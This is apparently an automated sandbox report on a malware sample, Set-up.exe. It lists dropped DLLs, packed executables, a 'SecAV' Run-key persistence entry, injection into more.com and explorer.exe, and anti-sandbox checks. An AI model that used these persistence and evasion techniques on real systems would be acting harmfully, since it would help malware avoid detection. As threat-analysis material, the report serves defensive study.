                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_date_time\lib\win\release\32\boost_date_time.pdb source: Server.exe, 0000000C.00000002.2388499779.00000000014EA000.00000002.00000001.01000000.0000001C.sdmp, Server.exe, 0000000C.00000003.2348355650.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452932471.00000000014EA000.00000002.00000001.01000000.0000001C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dynamiclink\dynamiclink\lib\win\release\32\dynamiclink.pdb source: Server.exe, 0000000C.00000002.2384291220.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp, Server.exe, 0000000F.00000002.2451249381.0000000000DE0000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLFoundation.pdb source: Server.exe, 0000000C.00000002.2387826797.0000000001185000.00000002.00000001.01000000.00000014.sdmp, Server.exe, 0000000F.00000002.2452133018.0000000001185000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_threads\lib\win\release\32\boost_threads.pdb source: Server.exe, 0000000C.00000003.2348584788.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2388668803.0000000001523000.00000002.00000001.01000000.0000001D.sdmp, Server.exe, 0000000F.00000002.2453076234.0000000001523000.00000002.00000001.01000000.0000001D.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdb source: Server.exe, 0000000C.00000002.2388342902.000000000136C000.00000002.00000001.01000000.00000017.sdmp, Server.exe, 0000000C.00000002.2383652464.000000000095C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452791153.00000000014AC000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Server.exe, 0000000C.00000002.2397298684.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397620533.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397448269.000000000BD30000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000D.00000002.2471368997.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470509483.000000000444D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461798889.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461583394.000000000BBE0000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461443949.000000000B884000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2482810467.00000000040BC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2485051962.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3679344144.0000000005670000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbp source: Server.exe, 0000000F.00000002.2450681224.0000000000B14000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdb source: Server.exe, 0000000C.00000002.2397298684.000000000B9D3000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397620533.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2397448269.000000000BD30000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000D.00000002.2471368997.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000D.00000002.2470509483.000000000444D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461798889.000000000BF95000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461583394.000000000BBE0000.00000004.00000800.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2461443949.000000000B884000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2482810467.00000000040BC000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000010.00000002.2485051962.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3679344144.0000000005670000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbPH,[G source: Server.exe, 0000000C.00000002.2383652464.000000000095C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2426408049.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdbP source: Server.exe, 0000000C.00000002.2392203293.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000002.2456416345.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\MediaFoundation.pdb source: Server.exe, 0000000C.00000002.2388207711.00000000012B0000.00000002.00000001.01000000.00000016.sdmp, Server.exe, 0000000C.00000003.2353264127.000000000093C000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2452454538.00000000012B0000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvacore\lib\win\release\32\dvacore.pdb source: Server.exe, 0000000C.00000002.2383984278.0000000000B7E000.00000002.00000001.01000000.0000000B.sdmp, Server.exe, 0000000F.00000002.2450483452.0000000000A1E000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\svml\sharedmd\svml_dispmd_full_pdb.pdb source: Server.exe, 0000000C.00000002.2389338172.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp, Server.exe, 0000000C.00000003.2353968785.000000000C15D000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C017000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2453668794.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Memory.pdb source: Server.exe, 0000000C.00000002.2392305204.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp, Server.exe, 0000000F.00000002.2456559187.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\svml\sharedmd\svml_dispmd_full_pdb.pdb` source: Server.exe, 0000000C.00000002.2389338172.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp, Server.exe, 0000000C.00000003.2353968785.000000000C15D000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2423690281.000000000C017000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2453668794.0000000001DBB000.00000002.00000001.01000000.0000001E.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ImageRenderer.pdb source: Server.exe, 0000000C.00000003.2350838055.0000000001ED5000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2387210258.0000000001091000.00000002.00000001.01000000.00000012.sdmp, Server.exe, 0000000F.00000003.2421210603.000000000BF97000.00000004.00000001.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2451595701.0000000001091000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdbPA source: Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbPL source: Server.exe, 0000000F.00000002.2452791153.00000000014AC000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: d:\users\nbtester\x86win_nightly\branch-14_0\20130730_000000\dev\build_objs\x86win_d0p0flexlm\libobj\libm\md\libmmd.pdb source: Server.exe, 0000000C.00000002.2398521146.00000000101F1000.00000002.00000001.01000000.00000019.sdmp, Server.exe, 0000000F.00000002.2463471681.00000000101F1000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: msvcr100.i386.pdb source: Server.exe, 0000000C.00000002.2399201545.000000006D051000.00000020.00000001.01000000.00000010.sdmp, Server.exe, 0000000F.00000003.2423525477.0000000000686000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2463800741.000000006D0B1000.00000020.00000001.01000000.00000010.sdmp
                  Source: Binary string: msvcp100.i386.pdb source: Server.exe, 0000000C.00000002.2399662755.000000006D111000.00000020.00000001.01000000.0000000F.sdmp, Server.exe, 0000000F.00000002.2463953503.000000006D171000.00000020.00000001.01000000.0000000F.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdb source: Server.exe, 0000000C.00000002.2383286120.0000000000674000.00000002.00000001.01000000.0000000C.sdmp, Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000F.00000002.2450681224.0000000000B14000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\PRM.pdbP source: Server.exe, 0000000C.00000002.2387654978.0000000001123000.00000002.00000001.01000000.00000013.sdmp, Server.exe, 0000000F.00000002.2451989524.0000000001123000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLUnitTesting.pdb source: Server.exe, 0000000C.00000003.2348147019.000000000093D000.00000004.00000020.00020000.00000000.sdmp, Server.exe, 0000000C.00000002.2392203293.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000002.2456416345.0000000001E0F000.00000002.00000001.01000000.0000001A.sdmp, Server.exe, 0000000F.00000003.2418558059.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\PRM.pdb source: Server.exe, 0000000C.00000002.2387654978.0000000001123000.00000002.00000001.01000000.00000013.sdmp, Server.exe, 0000000F.00000002.2451989524.0000000001123000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\VideoFrame.pdbP8 source: Server.exe, 0000000C.00000002.2388342902.000000000136C000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbpC(zB source: Server.exe, 0000000C.00000003.2349686201.000000000093D000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\bslave-ngproducts\builddir\build\mc_adobe_sdk_dbginfo_win32_ia32_release\mc_enc_dv.pdb source: Server.exe, 0000000C.00000002.2398936453.000000006CE89000.00000002.00000001.01000000.00000018.sdmp, Server.exe, 0000000F.00000002.2464131766.0000000070149000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdbPQ source: Server.exe, 0000000F.00000002.2449859124.0000000000514000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLFoundation.pdb` source: Server.exe, 0000000C.00000002.2387826797.0000000001185000.00000002.00000001.01000000.00000014.sdmp, Server.exe, 0000000F.00000002.2452133018.0000000001185000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\ASLMessaging.pdb source: Server.exe, 0000000C.00000002.2388001008.0000000001203000.00000002.00000001.01000000.00000015.sdmp, Server.exe, 0000000F.00000002.2452288985.0000000001203000.00000002.00000001.01000000.00000015.sdmp, Server.exe, 0000000F.00000003.2418315122.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdb source: Server.exe, 0000000C.00000002.2382831511.0000000000624000.00000002.00000001.01000000.0000000A.sdmp, Server.exe, 0000000F.00000002.2449859124.0000000000514000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Memory.pdbl` source: Server.exe, 0000000C.00000002.2392305204.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp, Server.exe, 0000000F.00000002.2456559187.0000000001E34000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\third_party\projects\boost_system\lib\win\release\32\boost_system.pdbPb source: Server.exe, 0000000C.00000002.2382831511.0000000000624000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvamediatypes\lib\win\release\32\dvamediatypes.pdbph(zg source: Server.exe, 0000000C.00000002.2383286120.0000000000674000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\dynamiclinkmediaserver\Targets\Win\Release\64\32\Adobe QT32 Server.pdb source: Server.exe, 0000000C.00000002.2382705300.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000C.00000000.2328182678.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000F.00000002.2449639002.00000000004BB000.00000002.00000001.01000000.00000009.sdmp, Server.exe, 0000000F.00000000.2399740812.00000000004BB000.00000002.00000001.01000000.00000009.sdmp
                  Source: Binary string: D:\DynamicLinkMediaServer8\releases\2014.03\shared\adobe\dvatransport\lib\win\release\32\dvatransport.pdb source: Server.exe, 0000000C.00000002.2383495933.0000000000824000.00000002.00000001.01000000.0000000D.sdmp, Server.exe, 0000000F.00000002.2450849542.0000000000BA4000.00000002.00000001.01000000.0000000D.sdmp, Server.exe, 0000000F.00000003.2420274218.0000000000686000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\bslave-ngproducts\builddir\build\mc_adobe_sdk_dbginfo_win32_ia32_release\mc_enc_dv.pdbP6 source: Server.exe, 0000000C.00000002.2398936453.000000006CE89000.00000002.00000001.01000000.00000018.sdmp, Server.exe, 0000000F.00000002.2464131766.0000000070149000.00000002.00000001.01000000.00000018.sdmp

                  Data Obfuscation

                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Unpacked PE file: 11.2.K07BOQJSAWQXKEH8FTYNN.exe.2930000.2.unpack
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Unpacked PE file: 25.2.rareTemp.exe.2990000.2.unpack
                  Source: ertyayyeqtcs.13.dr | Static PE information: real checksum: 0x0 should be: 0x5a53f2
                  Source: libmmd.dll.1.dr | Static PE information: real checksum: 0x3eeae4 should be: 0x3e9d6d
                  Source: Set-up.exe | Static PE information: real checksum: 0x0 should be: 0x63839f
                  Source: libmmd.dll.12.dr | Static PE information: real checksum: 0x3eeae4 should be: 0x3e9d6d
                  Source: ImageRenderer.dll.1.dr | Static PE information: section name: .text1
                  Source: ImageRenderer.dll.1.dr | Static PE information: section name: .data1
                  Source: ImageRenderer.dll.1.dr | Static PE information: section name: _RDATA
                  Source: libmmd.dll.1.dr | Static PE information: section name: .trace
                  Source: ImageRenderer.dll.12.dr | Static PE information: section name: .text1
                  Source: ImageRenderer.dll.12.dr | Static PE information: section name: .data1
                  Source: ImageRenderer.dll.12.dr | Static PE information: section name: _RDATA
                  Source: libmmd.dll.12.dr | Static PE information: section name: .trace
                  Source: ertyayyeqtcs.13.dr | Static PE information: section name: .symtab
                  Source: ertyayyeqtcs.13.dr | Static PE information: section name: fey
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_004A63A5 push ecx; ret 12_2_004A63B8
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_00622CA5 push ecx; ret 12_2_00622CB8
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0066E371 push ecx; ret 12_2_0066E384
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0066E515 push ecx; ret 12_2_0066E528
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_004A63A5 push ecx; ret 15_2_004A63B8
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_00512CA5 push ecx; ret 15_2_00512CB8
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_009E8AE5 push ecx; ret 15_2_009E8AF8
                  Source: msvcr100.dll.1.dr | Static PE information: section name: .text entropy: 6.909044922675825
                  Source: msvcr100.dll.12.dr | Static PE information: section name: .text entropy: 6.909044922675825
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ImageRenderer.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Memory.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\VideoFrame.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\VideoFrame.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\dvacore.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\mc_enc_dv.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\boost_system.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\msvcp100.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\Memory.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\boost_date_time.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\msvcr100.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dvamediatypes.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLFoundation.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\dvatransport.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\boost_system.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\ASLUnitTesting.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLMessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\boost_threads.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\ASLUnitTesting.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\ImageRenderer.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\dvamarshal.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\PRM.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dvamarshal.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\ASLMessaging.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dvatransport.dll
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | File created: C:\Users\user\AppData\Local\Temp\rareTemp.exe
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dynamiclink.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\dvamediatypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\boost_date_time.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\boost_threads.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\ASLFoundation.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\MediaFoundation.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\dvacore.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\libmmd.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\svml_dispmd.dll
                  Source: C:\Windows\SysWOW64\more.com | File created: C:\Users\user\AppData\Local\Temp\ertyayyeqtcs
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\libmmd.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\MediaFoundation.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\svml_dispmd.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\msvcp100.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\msvcr100.dll
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\mc_enc_dv.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | File created: C:\Users\user\AppData\Roaming\Othello\dynamiclink.dll
                  Source: C:\Users\user\Desktop\Set-up.exe | File created: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\PRM.dll
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SecAV

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\more.com | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\ERTYAYYEQTCS
                  Source: C:\Users\user\Desktop\Set-up.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Set-up.exe | System information queried: FirmwareTableInformation
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | API/Special instruction interceptor: Address: 6CCF7C44
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | API/Special instruction interceptor: Address: 6CCF7945
                  Source: C:\Windows\SysWOW64\more.com | API/Special instruction interceptor: Address: 6CCF3B54
                  Source: C:\Windows\SysWOW64\explorer.exe | API/Special instruction interceptor: Address: E5A317
                  Source: Set-up.exe, 00000001.00000000.1203909228.00000000013D4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: P`8P`ERROR MESSAGEERROR NOT SUPPORT SYSTEMMPVMP32ENTRYKERNEL32.DLLERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMERROR MESSAGEERROR NOT SUPPORT SYSTEMVMTOOLSD.EXECUCKOO_SVC.EXEXENSERVICE.EXEPROCMON.EXE5#
                  Source: C:\Windows\SysWOW64\more.com | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ertyayyeqtcs
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | API coverage: 0.3 %
                  Source: C:\Users\user\Desktop\Set-up.exe TID: 7620 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\SysWOW64\explorer.exe TID: 7732 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\explorer.exe | File opened: PhysicalDrive0
                  Source: C:\Users\user\Desktop\Set-up.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
